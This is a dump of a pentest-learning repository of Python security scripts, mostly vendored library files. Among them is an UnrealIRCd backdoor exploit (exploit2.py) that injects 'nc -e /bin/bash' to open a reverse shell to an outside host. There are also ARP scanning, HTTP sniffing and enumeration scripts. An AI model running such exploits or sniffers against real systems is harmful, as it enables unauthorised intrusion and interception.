-------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/codingstatemachine.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/langbulgarianmodel.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/langbulgarianmodel.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/langhungarianmodel.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/langhungarianmodel.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-37.pyc -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/cli/status_codes.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | SUCCESS = 0 4 | ERROR = 1 5 | UNKNOWN_ERROR = 2 6 | VIRTUALENV_NOT_FOUND = 3 7 | PREVIOUS_BUILD_DIR_ERROR = 4 8 | NO_MATCHES_FOUND = 23 9 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-37.pyc -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/cli/status_codes.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | SUCCESS = 0 4 | ERROR = 1 5 | UNKNOWN_ERROR = 2 6 | VIRTUALENV_NOT_FOUND = 3 7 | PREVIOUS_BUILD_DIR_ERROR = 4 8 | NO_MATCHES_FOUND = 23 9 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/cli/status_codes.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | SUCCESS = 0 4 | ERROR = 1 5 | UNKNOWN_ERROR = 2 6 | VIRTUALENV_NOT_FOUND = 3 7 | PREVIOUS_BUILD_DIR_ERROR = 4 8 | NO_MATCHES_FOUND = 23 9 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/ssl_match_hostname/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/ssl_match_hostname/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /Mitm/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/layers/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Layer package. 8 | """ 9 | -------------------------------------------------------------------------------- /tcp_socket_client/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/ssl_match_hostname/__pycache__/_implementation.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/ssl_match_hostname/__pycache__/_implementation.cpython-37.pyc -------------------------------------------------------------------------------- /KeyLogger/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /MacChanger/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Mitm/.idea/Mitm.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/layers/tls/crypto/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard 3 | # 2015, 2016 Maxence Tury 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Cryptographic capabilities for TLS. 8 | """ 9 | -------------------------------------------------------------------------------- /BackDoor/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /KeyLogger/.idea/KeyLogger.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NetworkScanner/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/tools/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Additional tools to be run separately 8 | """ 9 | -------------------------------------------------------------------------------- /PacketListener/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /BackDoor/.idea/SocketListener.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /PacketListener/.idea/PacketListener.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/chardetect: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/auth/venv/bin/python 2 | # -*- coding: utf-8 -*- 3 | import re 4 | import sys 5 | 6 | from chardet.cli.chardetect import main 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit(main()) 11 | -------------------------------------------------------------------------------- /unreal_irc_backdoor/exploit2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | rhost = '10.10.10.117' 5 | rport = 8067 6 | payload = 'nc -e /bin/bash 10.10.14.6 4444' 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | s.connect((rhost, rport)) 9 | s.recv(1024) 10 | s.send((f'AB; ' + payload + '\n').encode()) 11 | s.close() 12 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/tools/automotive/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Nils Weiss 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Automotive related tools to be run separately 8 | """ 9 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/version.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module exists only to simplify retrieving the version number of chardet 3 | from within setup.py and from chardet subpackages. 4 | 5 | :author: Dan Blanchard (dan.blanchard@gmail.com) 6 | """ 7 | 8 | __version__ = "3.0.4" 9 | VERSION = __version__.split('.') 10 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/compat.py: -------------------------------------------------------------------------------- 1 | from .core import * 2 | from .codec import * 3 | 4 | def ToASCII(label): 5 | return encode(label) 6 | 7 | def ToUnicode(label): 8 | return decode(label) 9 | 10 | def nameprep(s): 11 | raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol") 12 | 13 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/colorama/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | from .initialise import init, deinit, reinit, colorama_text 3 | from .ansi import Fore, Back, Style, Cursor 4 | from .ansitowin32 import AnsiToWin32 5 | 6 | __version__ = '0.4.1' 7 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi/core.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | """ 4 | certifi.py 5 | ~~~~~~~~~~ 6 | 7 | This module returns the installation location of cacert.pem. 8 | """ 9 | import os 10 | 11 | 12 | def where(): 13 | f = os.path.dirname(__file__) 14 | 15 | return os.path.join(f, 'cacert.pem') 16 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/colorama/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | from .initialise import init, deinit, reinit, colorama_text 3 | from .ansi import Fore, Back, Style, Cursor 4 | from .ansitowin32 import AnsiToWin32 5 | 6 | __version__ = '0.4.1' 7 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/colorama/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | from .initialise import init, deinit, reinit, colorama_text 3 | from .ansi import Fore, Back, Style, Cursor 4 | from .ansitowin32 import AnsiToWin32 5 | 6 | __version__ = '0.4.1' 7 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Package of contrib modules that have to be loaded explicitly. 8 | """ 9 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/modules/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Package of extension modules that have to be loaded explicitly. 8 | """ 9 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/chardet/version.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module exists only to simplify retrieving the version number of chardet 3 | from within setup.py and from chardet subpackages. 4 | 5 | :author: Dan Blanchard (dan.blanchard@gmail.com) 6 | """ 7 | 8 | __version__ = "3.0.4" 9 | VERSION = __version__.split('.') 10 | -------------------------------------------------------------------------------- /NetworkScanner_2/host_scan.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | interface = f"{sys.argv[1]}" 3 | ip_range = f"{sys.argv[2]}" 4 | broadcastMac = "ff:ff:ff:ff:ff:ff" 5 | packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) 6 | ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1) 7 | for send,receive in ans: 8 | print (receive.sprintf(r"%Ether.src% - %ARP.psrc%")) 9 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/compat.py: -------------------------------------------------------------------------------- 1 | from .core import * 2 | from .codec import * 3 | 4 | def ToASCII(label): 5 | return encode(label) 6 | 7 | def ToUnicode(label): 8 | return decode(label) 9 | 10 | def nameprep(s): 11 | raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol") 12 | 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/chardet/version.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module exists only to simplify retrieving the version number of chardet 3 | from within setup.py and from chardet subpackages. 4 | 5 | :author: Dan Blanchard (dan.blanchard@gmail.com) 6 | """ 7 | 8 | __version__ = "3.0.4" 9 | VERSION = __version__.split('.') 10 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/compat.py: -------------------------------------------------------------------------------- 1 | from .core import * 2 | from .codec import * 3 | 4 | def ToASCII(label): 5 | return encode(label) 6 | 7 | def ToUnicode(label): 8 | return decode(label) 9 | 10 | def nameprep(s): 11 | raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol") 12 | 13 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/chardet/version.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module exists only to simplify retrieving the version number of chardet 3 | from within setup.py and from chardet subpackages. 4 | 5 | :author: Dan Blanchard (dan.blanchard@gmail.com) 6 | """ 7 | 8 | __version__ = "3.0.4" 9 | VERSION = __version__.split('.') 10 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/compat.py: -------------------------------------------------------------------------------- 1 | from .core import * 2 | from .codec import * 3 | 4 | def ToASCII(label): 5 | return encode(label) 6 | 7 | def ToUnicode(label): 8 | return decode(label) 9 | 10 | def nameprep(s): 11 | raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol") 12 | 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Python Security Scripts/Codes 2 | Python is probably the most widely used and most convenient scripting language in cybersecurity. The examples of Python scripts including hash cracking, key logging, enumeration, scanning, more, so on and so forth. 3 | 4 | + **Python for Pentesters:** https://medium.com/p/47b7ce525b90 5 | 6 | Will continue to be updated regularly! 7 | 8 | 9 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/_backport/__init__.py: -------------------------------------------------------------------------------- 1 | """Modules copied from Python 3 standard libraries, for internal use only. 2 | 3 | Individual classes and functions are found in d2._backport.misc. Intended 4 | usage is to always import things missing from 3.1 from that module: the 5 | built-in/stdlib objects will be used if found. 6 | """ 7 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/_backport/__init__.py: -------------------------------------------------------------------------------- 1 | """Modules copied from Python 3 standard libraries, for internal use only. 2 | 3 | Individual classes and functions are found in d2._backport.misc. Intended 4 | usage is to always import things missing from 3.1 from that module: the 5 | built-in/stdlib objects will be used if found. 6 | """ 7 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/layers/tls/crypto/common.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # Copyright (C) Philippe Biondi 3 | # This program is published under a GPLv2 license 4 | 5 | """ 6 | TLS ciphers. 7 | """ 8 | 9 | 10 | class CipherError(Exception): 11 | """ 12 | Raised when .decrypt() or .auth_decrypt() fails. 13 | """ 14 | pass 15 | -------------------------------------------------------------------------------- /Zip-Password-Cracker/README.md: -------------------------------------------------------------------------------- 1 | # Usage 2 | + `python3 zip_crack.py file.zip wordlist` 3 | + `python3 zip_crack.py 16162020_backup.zip /usr/share/wordlists/rockyou.txt` 4 | 5 | ![image](https://github.com/h4md153v63n/Python_Scripts/assets/5091265/cbba1db3-59dd-4e48-9ead-6ffee79e3a6f) 6 | 7 | ![image](https://github.com/h4md153v63n/Python_Scripts/assets/5091265/b24f44bb-4917-44af-a9b2-e58b85c62fd0) 8 | 9 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/_backport/__init__.py: -------------------------------------------------------------------------------- 1 | """Modules copied from Python 3 standard libraries, for internal use only. 2 | 3 | Individual classes and functions are found in d2._backport.misc. Intended 4 | usage is to always import things missing from 3.1 from that module: the 5 | built-in/stdlib objects will be used if found. 6 | """ 7 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/utils/setuptools_build.py: -------------------------------------------------------------------------------- 1 | # Shim to wrap setup.py invocation with setuptools 2 | SETUPTOOLS_SHIM = ( 3 | "import setuptools, tokenize;__file__=%r;" 4 | "f=getattr(tokenize, 'open', open)(__file__);" 5 | "code=f.read().replace('\\r\\n', '\\n');" 6 | "f.close();" 7 | "exec(compile(code, __file__, 'exec'))" 8 | ) 9 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/utils/setuptools_build.py: -------------------------------------------------------------------------------- 1 | # Shim to wrap setup.py invocation with setuptools 2 | SETUPTOOLS_SHIM = ( 3 | "import setuptools, tokenize;__file__=%r;" 4 | "f=getattr(tokenize, 'open', open)(__file__);" 5 | "code=f.read().replace('\\r\\n', '\\n');" 6 | "f.close();" 7 | "exec(compile(code, __file__, 'exec'))" 8 | ) 9 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/utils/setuptools_build.py: -------------------------------------------------------------------------------- 1 | # Shim to wrap setup.py invocation with setuptools 2 | SETUPTOOLS_SHIM = ( 3 | "import setuptools, tokenize;__file__=%r;" 4 | "f=getattr(tokenize, 'open', open)(__file__);" 5 | "code=f.read().replace('\\r\\n', '\\n');" 6 | "f.close();" 7 | "exec(compile(code, __file__, 'exec'))" 8 | ) 9 | -------------------------------------------------------------------------------- /PacketListener/packet_listener.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | from scapy_http import http 3 | 4 | 5 | def listen_packets(iface): 6 | scapy.sniff(iface=iface, store=False, prn=analyze_packets) 7 | 8 | 9 | def analyze_packets(packet): 10 | if packet.haslayer(http.HTTPRequest): 11 | if packet.haslayer(scapy.Raw): 12 | print(packet[scapy.Raw].load) 13 | 14 | 15 | listen_packets("eth0") -------------------------------------------------------------------------------- /Directory_Enumeration/direnum.py: -------------------------------------------------------------------------------- 1 | import os,requests,sys 2 | file = f"{sys.argv[1]}" 3 | path=os.getcwd() + file 4 | sub_list = open(file).read() 5 | directories = sub_list.splitlines() 6 | for dir in directories: 7 | dir_enum = f"http://{sys.argv[2]}/{dir}.html" 8 | r = requests.get(dir_enum) 9 | if r.status_code==404: 10 | pass 11 | else: 12 | print("Valid directory:" ,dir_enum) 13 | -------------------------------------------------------------------------------- /MacChanger/.idea/MacChanger.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NetworkScanner/.idea/NetworkScanner.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Nils Weiss 4 | # This program is published under a GPLv2 license 5 | 6 | # scapy.contrib.status = skip 7 | 8 | """ 9 | Package of contrib automotive modules that have to be loaded explicitly. 10 | """ 11 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/layers/tls/crypto/all.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard 3 | # 2015, 2016, 2017 Maxence Tury 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Aggregate some TLS crypto objects. 8 | """ 9 | 10 | # flake8: noqa: F403 11 | 12 | from scapy.layers.tls.crypto.suites import * # noqa: F401 13 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/base.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | 4 | class Filter(object): 5 | def __init__(self, source): 6 | self.source = source 7 | 8 | def __iter__(self): 9 | return iter(self.source) 10 | 11 | def __getattr__(self, name): 12 | return getattr(self.source, name) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/base.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | 4 | class Filter(object): 5 | def __init__(self, source): 6 | self.source = source 7 | 8 | def __iter__(self): 9 | return iter(self.source) 10 | 11 | def __getattr__(self, name): 12 | return getattr(self.source, name) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/bmw/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Nils Weiss 4 | # This program is published under a GPLv2 license 5 | 6 | # scapy.contrib.status = skip 7 | 8 | """ 9 | Package of contrib automotive bmw specific modules 10 | that have to be loaded explicitly. 11 | """ 12 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/gm/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Nils Weiss 4 | # This program is published under a GPLv2 license 5 | 6 | # scapy.contrib.status = skip 7 | 8 | """ 9 | Package of contrib automotive gm specific modules 10 | that have to be loaded explicitly. 11 | """ 12 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/base.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | 4 | class Filter(object): 5 | def __init__(self, source): 6 | self.source = source 7 | 8 | def __iter__(self): 9 | return iter(self.source) 10 | 11 | def __getattr__(self, name): 12 | return getattr(self.source, name) 13 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/__init__.py: -------------------------------------------------------------------------------- 1 | """CacheControl import Interface. 2 | 3 | Make it easy to import from cachecontrol without long namespaces. 4 | """ 5 | __author__ = "Eric Larson" 6 | __email__ = "eric@ionrock.org" 7 | __version__ = "0.12.5" 8 | 9 | from .wrapper import CacheControl 10 | from .adapter import CacheControlAdapter 11 | from .controller import CacheController 12 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/_trie/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | from .py import Trie as PyTrie 4 | 5 | Trie = PyTrie 6 | 7 | # pylint:disable=wrong-import-position 8 | try: 9 | from .datrie import Trie as DATrie 10 | except ImportError: 11 | pass 12 | else: 13 | Trie = DATrie 14 | # pylint:enable=wrong-import-position 15 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/__init__.py: -------------------------------------------------------------------------------- 1 | """CacheControl import Interface. 2 | 3 | Make it easy to import from cachecontrol without long namespaces. 4 | """ 5 | __author__ = "Eric Larson" 6 | __email__ = "eric@ionrock.org" 7 | __version__ = "0.12.5" 8 | 9 | from .wrapper import CacheControl 10 | from .adapter import CacheControlAdapter 11 | from .controller import CacheController 12 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/_trie/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | from .py import Trie as PyTrie 4 | 5 | Trie = PyTrie 6 | 7 | # pylint:disable=wrong-import-position 8 | try: 9 | from .datrie import Trie as DATrie 10 | except ImportError: 11 | pass 12 | else: 13 | Trie = DATrie 14 | # pylint:enable=wrong-import-position 15 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/__init__.py: -------------------------------------------------------------------------------- 1 | """CacheControl import Interface. 2 | 3 | Make it easy to import from cachecontrol without long namespaces. 4 | """ 5 | __author__ = "Eric Larson" 6 | __email__ = "eric@ionrock.org" 7 | __version__ = "0.12.5" 8 | 9 | from .wrapper import CacheControl 10 | from .adapter import CacheControlAdapter 11 | from .controller import CacheController 12 | -------------------------------------------------------------------------------- /Subdomain_Enumeration/subdomain_enum.py: -------------------------------------------------------------------------------- 1 | import os,requests,sys 2 | file = f"{sys.argv[1]}" 3 | path=os.getcwd() + file 4 | sub_list = open(file).read() 5 | subdoms = sub_list.splitlines() 6 | for sub in subdoms: 7 | sub_domains = f"http://{sub}.{sys.argv[2]}" 8 | try: 9 | requests.get(sub_domains) 10 | 11 | except requests.ConnectionError: 12 | pass 13 | 14 | else: 15 | print("Valid domain: ",sub_domains) 16 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/_trie/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import, division, unicode_literals 2 | 3 | from .py import Trie as PyTrie 4 | 5 | Trie = PyTrie 6 | 7 | # pylint:disable=wrong-import-position 8 | try: 9 | from .datrie import Trie as DATrie 10 | except ImportError: 11 | pass 12 | else: 13 | Trie = DATrie 14 | # pylint:enable=wrong-import-position 15 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/core.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | certifi.py 6 | ~~~~~~~~~~ 7 | 8 | This module returns the installation location of cacert.pem. 9 | """ 10 | import os 11 | 12 | 13 | def where(): 14 | f = os.path.dirname(__file__) 15 | 16 | return os.path.join(f, 'cacert.pem') 17 | 18 | 19 | if __name__ == '__main__': 20 | print(where()) 21 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/core.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | certifi.py 6 | ~~~~~~~~~~ 7 | 8 | This module returns the installation location of cacert.pem. 9 | """ 10 | import os 11 | 12 | 13 | def where(): 14 | f = os.path.dirname(__file__) 15 | 16 | return os.path.join(f, 'cacert.pem') 17 | 18 | 19 | if __name__ == '__main__': 20 | print(where()) 21 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/core.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | certifi.py 6 | ~~~~~~~~~~ 7 | 8 | This module returns the installation location of cacert.pem. 9 | """ 10 | import os 